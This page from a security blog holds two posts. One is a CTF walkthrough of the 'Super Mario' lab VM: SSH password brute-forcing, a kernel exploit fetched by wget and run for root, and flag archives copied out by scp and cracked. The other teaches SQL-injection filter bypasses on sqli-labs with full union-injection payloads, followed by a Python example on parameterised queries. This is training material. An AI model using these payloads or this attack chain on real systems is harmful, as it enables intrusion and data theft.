Hack the Super Mario (CTF Challenge)

Wed, 07/Jun/2017 - 21:03

Hello friends!! You may have played THE SUPER MARIO game once in your childhood, and no wonder if the thought of hacking the game has struck your mind. Whatever you thought, today we are going to make it come true, and for that you need to download the new Super Mario VM from here.

The credit for developing this VM goes to Mr_h4sh, who has hidden 2 flags inside this lab as a challenge for hackers. The level of the challenge is Intermediate.

Let’s breach!!!

 As you know we always start with enumeration, therefore open the terminal in your kali Linux and go for aggressive scan with nmap.

nmap –p- -A 192.168.0.5

Since port 22 and port 8180 for service SSH and HTTP respectively therefore I choose port 8081 for enumeration but from screenshot you can see I didn’t get any remarkable result.

Dirb http://192.168.0.5:8180

Then I move for directory brute force attack using following command

Dirb http://192.168.0.5:8180 /usr/share/wordlists/dirb/big.txt

In the given below screenshot you can read it has shown a file name vhosts, let’s explore it through browser.

Now explore vhost in URL as  http://192.168.0.5:8180/vhosts here vhosts stand for virtual host it is method for hosting multiple domain on a single server. From inside Vhosts I came know the Server Name is mario.supermariohost.local  

Let’s add mario.supermariohost.local into /etc as new localhost

Cd etc

Vim hosts

Now type “192.168.0.5 mario.supermariohost.local” inside the vim editor to add it in the /etc/host and after then type wq to save it.

Now Type Cat hosts to check added host name Hence you from screenshot you can see it has been had added inside it successfully.

Then I visit mario.supermariohost.local on browser and finally got Mario as browser game but it is not working.

We know ports 22 and 8081 were open and we did not get much information from enumerating port 8081. Now we move towards port 22 for SSH enumeration, so I prepared a dictionary in order to retrieve credentials for logging in to the SSH server.

The dictionary contains usernames taken from the famous characters of MARIO; you can check these names on Google as well.

Inside a text editor type the following names: Mario; luigi; peach; toad; yoshi and save the file as user on the desktop.

Use John the Ripper to generate a password dictionary with the following command. Here --rules enables the wordlist rules and --stdout writes the generated passwords, of a fixed length, to the desktop as pass.

john --wordlist=user --rules --stdout > pass

Finally we have the username dictionary user and the password dictionary pass generated by John; now we have to find the matching combination of user and pass in order to retrieve credentials for SSH login. I chose hydra for password cracking; you can choose any other password-cracking tool as well.

hydra -L user -P pass 192.168.0.5 ssh

From the given screenshot you can read the matched combination for the SSH server: username luigi and password luigi1.

Now type the following for SSH login

ssh luigi@192.168.0.5

Password: luigi1

Yeeppiii!!!! Finally we have logged in to the SSH server.

uname -a

Here we come to know that the Linux kernel version of supermariohost is 3.13.0; let's check for its exploit on Google.

Yes, there is an exploit for 3.13.0 (overlayfs local root in Ubuntu); download it from here inside your Kali Linux.

From the screenshot you can see I have downloaded the exploit as mario.c for privilege escalation.

Now type the following command to download mario.c onto the target system.

wget http://192.168.0.6/mario.c

The file is downloaded successfully; now type another command to compile mario.c

gcc mario.c -o mario

./mario

id

cd /root

ls

Awesome!!! We have got root privileges, and from the screenshot you can see that inside its directory I found a zip file, flag.zip.

Now type the following command to download flag.zip to the desktop of your Kali Linux

scp /root/flag.zip root@192.168.0.6:/root/Desktop

fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u flag.zip

As shown in the screenshot, PASSWORD FOUND!!!: pw == ilovepeach; now you can unzip the file using this password.

unzip flag.zip

It will ask for a password; give the password above to unzip it, and if you look at the given image it contains flag.txt

cat flag.txt

1st FLAG: Well done :D If you reached this it means you got root, congratulations.

Now follow the steps below in order to complete the other challenge.

iptables -L

Here from the screenshot you can see a new network has been added on the remote system.

arp -n

Now the target system has been forwarded to a new IP, 192.168.122.112

ls -la

Found a directory .bak

cd .bak

ls

cd users

cd luigi

ls

There are two files inside it; let's read them one by one

cat message

Hi Luigi,

Since you've been messing around with my host, at this point I want to return the favour. This is a "war", you "naughty" boy!

cat id_rsa.pub

The highlighted word in the given text looks like a username for logging in to the SSH server.

Let's make sure by logging in with: ssh -i id_rsa warluigi@192.168.122.112

Great!! All assumptions gave a positive result

Again check the kernel version

uname -a

Woooww!! It is the same version, so now we can use our mario.c exploit for root privileges. Hence repeat the steps above as shown in the images.

wget http://192.168.0.6/mario.c

The file is downloaded successfully; now type another command to compile mario.c

gcc mario.c -o mario

./mario

id

cd /root

ls -la

Here I found two important files, hint.txt and flag2.zip. Before going to unzip flag2.zip we must look at the hint.txt file.

cat .hint.txt

"Peach Loves Me" might be the password key for decrypting the flag2.zip file

Now let's download flag2.zip to the desktop of Kali Linux by using the following command again

scp /root/flag2.zip root@192.168.0.6:/root/Desktop

unzip flag2.zip

Now when it asks for the password key, type "Peach Loves Me"

It contains flag2.txt; type cat flag2.txt to open this file.

2nd FLAG: Congratulations on your second flag!

Wonderful!!! We have caught both flags

Rajat Chikara is an Ethical Hacker, Cyber Security Expert and Penetration Tester, India.

The post Hack the Super Mario (CTF Challenge) appeared first on Hacking Articles.

Categories: Cyber India

How to Bypass SQL Injection Filter Manually

Sat, 03/Jun/2017 - 23:09

In the previous article you learned the basic concepts of SQL injection, but in some scenarios you will find that your basic knowledge and tricks fail. The reason is the protection the developer has applied to prevent SQL injection: sometimes developers use filters to strip out a few characters and OPERATORS from the user input before adding it to the SQL statement. Today's article will help you face such situations and show you how to bypass such filters. Here again we'll be using the DHAKKAN SQLI labs for practice.

Let's start!!

LESSON 25

In Lab 25 the OR and AND keywords are blocked, so here we will try to bypass the SQL filter using their substitutes.

function blacklist($id)
{
    $id = preg_replace('/or/i', "", $id);    // strip out OR (case-insensitive)
    $id = preg_replace('/AND/i', "", $id);   // strip out AND (case-insensitive)
    return $id;
}

Since the words OR and AND are blacklisted, if we use AND 1=1 or OR 1=1 there will be no output; therefore I used %26%26 inside the query.

The following are the replacements for AND and OR

AND: && (URL-encoded as %26%26)

OR: ||

Open the browser and type the following SQL query in the URL

http://localhost:81/sqli/Less-25/?id=1' %26%26 1=1 --+

From the screenshot you can see we have successfully fixed the query by writing AND as && (URL-encoded as %26%26), even though the AND operator was filtered out.

Once the concept of bypassing the AND filter is clear, we next alter the SQL statement to retrieve database information.

http://localhost:81/sqli/Less-25/?id=-1' union select 1,2,3 %26%26 1=1 --+

Type the following query to retrieve the database name using union injection

http://localhost:81/sqli/Less-25/?id=-1' union select 1,database(),3 %26%26 1=1 --+

Hence you can see we have successfully got security as the database name.


The next query will list all the table names saved inside the database.

http://localhost:81/sqli/Less-25/?id=-1' union select 1,group_concat(table_name),3 from infoorrmation_schema.tables where table_schema=database() %26%26 1=1 --+

From the screenshot you can read the following table names:

T1: emails

T2: referers

T3: uagents

T4: users

Now we'll try to find out the column names of the users table using the following query.

http://localhost:81/sqli/Less-25/?id=-1' union select 1,group_concat(column_name),3 from infoorrmation_schema.columns where table_name='users' %26%26 1=1 --+

Hence you can see it contains 4 columns.

C1: id

C2: username

C3: password

At last, execute the following query to read all the usernames inside the users table.

http://localhost:81/sqli/Less-25/?id=-1' union select 1,group_concat(username),3 from users --+

From the screenshot you can read the fetched data.

Hence in lesson 25 we have learned how to bypass the AND and OR filters to retrieve information from the database.

LESSON 26

You will find lab 26 more challenging because here space, comments, OR and AND are blocked, so now we will try to bypass the SQL filter using their substitutes.

The following is the function blacklist($id)

function blacklist($id)
{
    $id = preg_replace('/or/i', "", $id);         // strip out OR (case-insensitive)
    $id = preg_replace('/and/i', "", $id);        // strip out AND (case-insensitive)
    $id = preg_replace('/[\/\*]/', "", $id);      // strip out / and *
    $id = preg_replace('/[--]/', "", $id);        // strip out --
    $id = preg_replace('/[#]/', "", $id);         // strip out #
    $id = preg_replace('/[\s]/', "", $id);        // strip out whitespace
    $id = preg_replace('/[\/\\\\]/', "", $id);    // strip out slashes
    return $id;
}

This lab has more filters compared to lab 25, because here space and comments are also blocked. Now execute the following query in the URL.

http://localhost:81/sqli/Less-26/?id=1'%a0%26%26'1=1

From the screenshot you can see we have successfully fixed the query by replacing the SPACE with the URL-encoded byte %a0

Blanks = ('%09', '%0A', '%0C', '%0D', '%0B', '%a0')

Once the concept of bypassing the AND, OR and SPACE filters is clear, we next alter the SQL statement to retrieve database information.

http://localhost:81/sqli/Less-26/?id=0'%a0union%a0select%a01,2,3%a0%26%26'1=1

Type the following query to retrieve the database name using union injection.

http://localhost:81/sqli/Less-26/?id=0'%a0union%a0select%a01,database(),3%a0%26%26'1=1

Hence you can see we have successfully got security as the database name

The next query will list all the table names saved inside the database.

http://localhost:81/sqli/Less-26/?id=0'%a0union%a0select%a01,group_concat(table_name),3%a0from%a0infoorrmation_schema.tables%a0where%a0table_schema=database()%a0%26%26'1=1

From the screenshot you can read the following table names:

T1: emails

T2: referers

T3: uagents

T4: users

Now we'll try to find out the column names of the users table using the following query.

http://localhost:81/sqli/Less-26/?id=0'%a0union%a0select%a01,group_concat(column_name),3%a0from%a0infoorrmation_schema.columns%a0where%a0table_name='users'%a0%26%26'1=1

Hence you can see the columns inside it.

C1: id

C2: username

C3: password

At last, execute the following query to read all the usernames inside the users table.

http://localhost:81/sqli/Less-26/?id=0'%a0union%a0select%a01,group_concat(username),3%a0from%a0users%a0where%a01%26%26%a0'1

From the screenshot you can read the fetched data.

Hence in lesson 26 we have learned how to bypass the AND, OR, SPACE and COMMENT filters to retrieve information from the database.

LESSON 27

You will find this lab even more challenging because here UNION/union, SELECT/select, SPACE and comments are blocked, so now we will try to bypass the SQL filter using their substitutes.

The following is the function blacklist($id)

function blacklist($id)
{
    $id = preg_replace('/[\/\*]/', "", $id);   // strip out / and *
    $id = preg_replace('/[--]/', "", $id);     // strip out --
    $id = preg_replace('/[#]/', "", $id);      // strip out #
    $id = preg_replace('/[ +]/', "", $id);     // strip out spaces and +
    $id = preg_replace('/select/m', "", $id);  // strip out select
    $id = preg_replace('/[ +]/', "", $id);     // strip out spaces and + (again)
    $id = preg_replace('/union/s', "", $id);   // strip out union
    $id = preg_replace('/select/s', "", $id);  // strip out select
    $id = preg_replace('/UNION/s', "", $id);   // strip out UNION
    $id = preg_replace('/SELECT/s', "", $id);  // strip out SELECT
    $id = preg_replace('/Union/s', "", $id);   // strip out Union
    $id = preg_replace('/Select/s', "", $id);  // strip out Select
    return $id;
}

This lab has more filters in addition to lab 26, because here union, select, space and comments are also blocked. Now execute the following query in the URL.

http://localhost:81/sqli/Less-27/?id=1' AND'1=1


Once the concept of bypassing the UNION/union, SELECT/select and SPACE filters is clear, we next alter the SQL statement to retrieve database information.

http://localhost:81/sqli/Less-27/?id=1'%a0UnIon%a0SeLect%a01,2,3%a0AND'1=1

In the screenshot you can see I have written union as UnIon and select as SeLect in the query to bypass the filter.

Now type the following query to retrieve the database name using union injection.

http://localhost:81/sqli/Less-27/?id=0'%a0UnIon%a0SeLect%a01,database(),3%a0AND'1=1

Hence you can see we have successfully got security as the database name

The next query will list all the table names saved inside the database.

http://localhost:81/sqli/Less-27/?id=0'%a0UnIon%a0SeLect%a01,group_concat(table_name),3%a0from%a0information_schema.tables%a0where%a0table_schema=database()%a0AND'1=1

From the screenshot you can read the following table names:

T1: emails

T2: referers

T3: uagents

T4: users

Now we'll try to find out the column names of the users table using the following query.

http://localhost:81/sqli/Less-27/?id=0'%a0UnIon%a0SeLect%a01,group_concat(column_name),3%a0from%a0information_schema.columns%a0where%a0table_name='users'%a0AND'1=1

Hence you can see the columns inside it.

C1: id

C2: username

C3: password

At last, execute the following query to read all the usernames inside the users table.

From the screenshot you can read the fetched data.

http://localhost:81/sqli/Less-27/?id=0'%a0UnIon%a0SeLect%a01,group_concat(column_name),3%a0from%a0information_schema.columns%a0where%a0table_name='users'%a0AND'1=1

 Hence in lesson 27 we have learned how to bypass UNION/union, SELECT/select, SPACE and COMMENT filter for retrieving information inside the database.
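To see why this kind of keyword blacklist fails and what actually fixes it, here is an added example (not the lab's PHP code and not from Hacking Articles) that ports the Less-25 and Less-27 blacklist() functions above to Python, runs the page's own inputs through them, and contrasts them with an allow-list check plus a parameterised query. The sqlite3 table, its rows and the function names are constructed for this demonstration.

```python
import re
import sqlite3

# Added example (not the lab's own code): Python ports of the sqli-labs blacklist()
# filters shown above, beside the defence that works (allow-list + bound parameter).

def blacklist_less25(value: str) -> str:
    """Port of the Less-25 filter: strip 'or' and 'and' case-insensitively, one pass each."""
    value = re.sub(r"or", "", value, flags=re.IGNORECASE)
    value = re.sub(r"and", "", value, flags=re.IGNORECASE)
    return value

def blacklist_less27(value: str) -> str:
    """Port of the Less-27 filter: comment characters, ASCII space/plus, six exact-case keywords."""
    value = re.sub(r"[/*]", "", value)   # strip / and *
    value = re.sub(r"-", "", value)      # strip - (the lab writes this class as [--])
    value = re.sub(r"#", "", value)      # strip #
    value = re.sub(r"[ +]", "", value)   # strip ASCII space and +; the byte 0xA0 (%a0) is not in the class
    for word in ("union", "select", "UNION", "SELECT", "Union", "Select"):
        value = value.replace(word, "")  # only these exact spellings are removed
    return value

def keyword_survives(blacklist, value: str, keyword: str) -> bool:
    """True when `keyword` is still present (case-insensitively) after the filter has run."""
    return keyword.lower() in blacklist(value).lower()

def is_safe_id(raw_id: str) -> bool:
    """Allow-list instead of blacklist: the id parameter may only be a short decimal integer."""
    return re.fullmatch(r"[0-9]{1,9}", raw_id) is not None

def demo_db() -> sqlite3.Connection:
    """In-memory users table with constructed sample rows (not the lab's data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                     [(1, "alice", "pw-1"), (2, "bob", "pw-2")])
    return conn

def lookup_user(conn: sqlite3.Connection, raw_id: str):
    """Safe lookup: reject anything that is not a plain integer, then bind it as a parameter."""
    if not is_safe_id(raw_id):
        return None
    row = conn.execute("SELECT username FROM users WHERE id = ?", (int(raw_id),)).fetchone()
    return row[0] if row else None

if __name__ == "__main__":
    # The page's own inputs: the doubled keyword and the %a0 separator pass the filters,
    # while the allow-list check rejects them before any SQL is built.
    print(blacklist_less25("infoorrmation_schema"))                                        # information_schema
    print(keyword_survives(blacklist_less27, "0'\xa0UnIon\xa0SeLect\xa01,2,3", "union"))  # True
    print(lookup_user(demo_db(), "1"), lookup_user(demo_db(), "0'\xa0UnIon\xa0SeLect\xa01,2,3"))  # alice None
```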

Author: Aarti Singh is a Researcher and Technical Writer at Hacking Articles, an Information Security Consultant, Social Media Lover and Gadgets enthusiast. Contact here

The post How to Bypass SQL Injection Filter Manually appeared first on Hacking Articles.

Categories: Cyber India